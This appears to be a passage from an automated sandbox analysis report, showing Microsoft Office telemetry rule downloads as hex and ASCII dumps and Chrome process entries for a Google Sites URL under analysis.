                                                                                                                    2024-11-25 18:53:29 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    63192.168.2.44985213.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:29 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:29 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:29 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 448
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                    ETag: "0x8DC582BB389F49B"
                                                                                                                    x-ms-request-id: 0d55f323-a01e-0032-4300-3f1949000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185329Z-15b8b599d88wn9hhhC1TEBry0g000000069g00000000q0p7
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:29 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    64192.168.2.44985313.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:29 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:30 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:29 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 491
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                    ETag: "0x8DC582B98B88612"
                                                                                                                    x-ms-request-id: 2abfc2a9-b01e-003d-094d-3cd32c000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185329Z-15b8b599d889gj5whC1TEBfyk0000000065g00000000bxs6
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:30 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    65192.168.2.44985413.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:29 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:30 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:30 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 416
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                    ETag: "0x8DC582BAEA4B445"
                                                                                                                    x-ms-request-id: a6b1c0e3-801e-002a-1ea2-3e31dc000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185330Z-178bfbc474bbcwv4hC1NYCypys00000007ug000000000rsw
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:30 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Target ID:0
                                                                                                                    Start time:13:52:05
                                                                                                                    Start date:25/11/2024
                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                    File size:3'242'272 bytes
                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:false

                                                                                                                    Target ID:1
                                                                                                                    Start time:13:52:08
                                                                                                                    Start date:25/11/2024
                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2200,i,17206734623280546298,7125097228973372212,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:3'242'272 bytes
                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:false

                                                                                                                    Target ID:3
                                                                                                                    Start time:13:52:10
                                                                                                                    Start date:25/11/2024
                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sites.google.com/ceqy.com/rfp/home"
                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                    File size:3'242'272 bytes
                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    No disassembly